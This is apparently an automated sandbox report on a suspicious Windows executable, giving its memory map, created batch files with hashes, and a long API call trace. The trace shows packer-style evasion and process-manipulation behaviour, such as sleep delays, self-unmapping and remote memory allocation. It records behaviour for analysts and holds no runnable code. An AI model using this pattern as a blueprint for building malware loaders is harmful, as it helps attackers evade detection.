pagefile_0x0000000000230000 0x00230000 0x00231fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000240000 0x00240000 0x00247fff Private Memory Readable, Writable True False False
private_0x0000000000250000 0x00250000 0x002cffff Private Memory Readable, Writable True False False
pagefile_0x00000000002d0000 0x002d0000 0x003aefff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003b0000 0x003b0000 0x003b0fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000003c0000 0x003c0000 0x003cffff Private Memory Readable, Writable True False False
private_0x00000000003d0000 0x003d0000 0x003fffff Private Memory Readable, Writable True False False
upde25b4796.exe 0x00400000 0x00432fff Memory Mapped File Readable, Writable, Executable True False False
private_0x0000000000400000 0x00400000 0x0041bfff Private Memory Readable, Writable, Executable True False False
private_0x0000000000440000 0x00440000 0x004bffff Private Memory Readable, Writable True False False
private_0x00000000004f0000 0x004f0000 0x005effff Private Memory Readable, Writable True False False
pagefile_0x00000000005f0000 0x005f0000 0x00777fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000780000 0x00780000 0x00900fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000910000 0x00910000 0x01d0ffff Pagefile Backed Memory Readable True False False
private_0x0000000001d10000 0x01d10000 0x01ebffff Private Memory Readable, Writable True False False
private_0x0000000001d10000 0x01d10000 0x01e2ffff Private Memory Readable, Writable True False False
private_0x0000000001d10000 0x01d10000 0x01d4ffff Private Memory Readable, Writable True False False
rsaenh.dll 0x01d50000 0x01d8bfff Memory Mapped File Readable False False False
private_0x0000000001df0000 0x01df0000 0x01e2ffff Private Memory Readable, Writable True False False
private_0x0000000001eb0000 0x01eb0000 0x01ebffff Private Memory Readable, Writable True False False
private_0x0000000001ec0000 0x01ec0000 0x022bffff Private Memory Readable, Writable True False False
sortdefault.nls 0x022c0000 0x0258efff Memory Mapped File Readable False False False
private_0x0000000002590000 0x02590000 0x0270ffff Private Memory Readable, Writable True False False
private_0x0000000002590000 0x02590000 0x026affff Private Memory Readable, Writable True False False
private_0x0000000002590000 0x02590000 0x0268ffff Private Memory Readable, Writable True False False
private_0x00000000026a0000 0x026a0000 0x026affff Private Memory Readable, Writable True False False
private_0x00000000026d0000 0x026d0000 0x0270ffff Private Memory Readable, Writable True False False
private_0x0000000002710000 0x02710000 0x028fffff Private Memory Readable, Writable True False False
private_0x0000000002710000 0x02710000 0x0288ffff Private Memory Readable, Writable True False False
private_0x0000000002710000 0x02710000 0x027dffff Private Memory Readable, Writable True False False
private_0x0000000002850000 0x02850000 0x0288ffff Private Memory Readable, Writable True False False
private_0x00000000028c0000 0x028c0000 0x028fffff Private Memory Readable, Writable True False False
pagefile_0x0000000002900000 0x02900000 0x02cf2fff Pagefile Backed Memory Readable True False False
staticcache.dat 0x02d00000 0x0362ffff Memory Mapped File Readable False False False
private_0x0000000003630000 0x03630000 0x0b62ffff Private Memory Readable, Writable, Executable True False False
msvbvm60.dll 0x72940000 0x72a92fff Memory Mapped File Readable, Writable, Executable True False False
dwmapi.dll 0x74130000 0x74142fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x741b0000 0x7422ffff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x743d0000 0x743d7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x743e0000 0x7443bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74440000 0x7447efff Memory Mapped File Readable, Writable, Executable False False False
sxs.dll 0x74e30000 0x74e8efff Memory Mapped File Readable, Writable, Executable False False False
dhcpcsvc.dll 0x74fd0000 0x74fe1fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x75630000 0x7566afff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x75670000 0x75685fff Memory Mapped File Readable, Writable, Executable False False False
secur32.dll 0x75690000 0x75697fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x756b0000 0x756cbfff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x756e0000 0x756e6fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75800000 0x7580bfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75810000 0x7586ffff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x758c0000 0x759bffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759c0000 0x75acffff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x75ad0000 0x75ad4fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75ae0000 0x75c3bfff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x75c40000 0x75e3afff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x75e70000 0x75f1bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x75f20000 0x76014fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x760b0000 0x7610ffff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76110000 0x761acfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x761b0000 0x7623efff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x76240000 0x7635cfff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x76360000 0x7636bfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76370000 0x763c6fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76570000 0x7663bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x76640000 0x76685fff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76690000 0x767c5fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x767d0000 0x767e8fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x767f0000 0x767f5fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76800000 0x768effff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x768f0000 0x768f9fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76950000 0x769dffff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x76a70000 0x776b9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x777e0000 0x77814fff Memory Mapped File Readable, Writable, Executable False False False
private_0x00000000778b0000 0x778b0000 0x779a9fff Private Memory Readable, Writable, Executable True False False
private_0x00000000779b0000 0x779b0000 0x77acefff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77ad0000 0x77c78fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77cb0000 0x77e2ffff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Created Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\appdata\local\temp\upd9dba1b78.bat 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\upd9dba1b78.bat 0.21 KB (216 bytes) MD5: 98de219891ef24cceaa12d1c41436654
SHA1: 7ad5ad583dfd70ed21dd2acef592c931def67f0a
SHA256: 14facf8fc3da422ce17a7695d1261c86078c97436ea643bc4d153aeda0904a88
False
Threads
Thread 0x548
(Host: 640, Network: 0)
+
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsTNT, address_out = 0x0 False 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x759d5235 True 1
Fn
Mutex Create - True 1
Fn
Module Get Handle module_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, base_address = 0x400000 True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
Module Get Filename module_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, size = 260 True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = OLEAUT32.DLL, base_address = 0x761b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x762170a1 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x761b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = DispCallFunc, address_out = 0x761c3dcf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x761c07b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x761e1ca9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = CreateTypeLib2, address_out = 0x761c8e70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromUdate, address_out = 0x761c7684 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarUdateFromDate, address_out = 0x761ccc98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetAltMonthNames, address_out = 0x761f903a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x761c6231 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x761c5fea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR4, address_out = 0x761d3f94 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR8, address_out = 0x761d4e9e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromDate, address_out = 0x761fdb72 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromI4, address_out = 0x761e2a8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromCy, address_out = 0x761fd737 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromDec, address_out = 0x761fe015 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x761fcc3d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x761fd1c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x761fd48c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x761fd4c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x761fd509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetIID, address_out = 0x761ce7bb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x761ce496 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x761cddf1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x761fd53f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormat, address_out = 0x76202055 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatDateTime, address_out = 0x762020ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatNumber, address_out = 0x76202151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatPercent, address_out = 0x762021f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatCurrency, address_out = 0x76202288 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarWeekdayName, address_out = 0x76202335 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMonthName, address_out = 0x762023d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x761d5934 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x761d5a98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCat, address_out = 0x761d59b4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x7622e405 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarEqv, address_out = 0x7622ef07 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x7622f00a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarImp, address_out = 0x7622ef47 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x7622f15e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x7622dbd4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x7622ecfa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarPow, address_out = 0x7622ea66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x7622d332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x7622ee2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAbs, address_out = 0x7622ca11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFix, address_out = 0x7622cc5f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarInt, address_out = 0x7622cde7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x7622c802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x7622ec66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarRound, address_out = 0x7622d155 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x761cb0dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecAdd, address_out = 0x761e5f3e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecCmp, address_out = 0x761d4fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCat, address_out = 0x761d0d2c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyMulI4, address_out = 0x761e59ed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCmp, address_out = 0x761bf8b8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75b29d4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x75af0782 True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, size = 260 True 2
Fn
Module Load module_name = SXS.DLL, base_address = 0x74e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x74e77685 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x758d7d2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x758e3150 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromRect, address_out = 0x758fe7a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromPoint, address_out = 0x758e5281 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x758e451a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x758e4413 True 1
Fn
Window Create class_name = ThunderRT6Main, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
Window Create class_name = VBMsoStdCompMgr, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = VBMsoStdCompMgr, index = 0, new_long = 40706204 False 1
Fn
Window Create class_name = VBFocusRT6, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
System Get Info type = Operating System True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Window Create window_name = Langskallet7, wndproc_parameter = 0 True 1
Fn
Module Load module_name = KERNEL32 , base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadProcessMemory, address_out = 0x759ecfcc True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumResourceTypesA, address_out = 0x75a50efd True 1
Fn
Module Load module_name = shell32, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76cb8af2 True 1
Fn
Module Load module_name = NTDLL, base_address = 0x77cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = ZwSetInformationProcess, address_out = 0x77ccfb18 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff True 1
Fn
Module Load module_name = user32, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDesktopWindow, address_out = 0x758e0a19 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 True 1
Fn
Module Load module_name = ntdll, base_address = 0x77cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtYieldExecution, address_out = 0x77ccff2c True 1
Fn
System Sleep duration = 15 milliseconds (0.015 seconds) True 32
Fn
System Sleep duration = 8000 milliseconds (8.000 seconds) True 1
Fn
Module Load module_name = ntdll, base_address = 0x77cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtProtectVirtualMemory, address_out = 0x77cd0028 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x759d53c6 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x759d196e True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x759d1826 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 0x75a545bf True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLongPathNameA, address_out = 0x75a5437f True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x759ed802 True 1
Fn
Module Load module_name = IPHlpApi, base_address = 0x756b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x756b9263 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 True 1
Fn
Module Load module_name = shell32, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x76cb7078 True 1
Fn
Module Load module_name = User32, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumWindows, address_out = 0x758dd1cf True 1
Fn
Module Load module_name = user32, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 True 1
Fn
Module Load module_name = user32, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumThreadWindows, address_out = 0x758e3961 True 1
Fn
Module Unmap process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x759d7a2f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x759d49d7 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x759d89b3 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77cf1f6e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x759e10b5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x759d34d5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x759d35b7 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x759d2d3c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77ce45f5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x759ddd0e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x759d14e9 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x759d5a7e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x759fd4c4 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x759d103d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x759d170d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x759d1400 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x759d5a96 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x759ed9c8 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x759fd075 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x759ed5cd True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x759d5151 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x759ece2e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
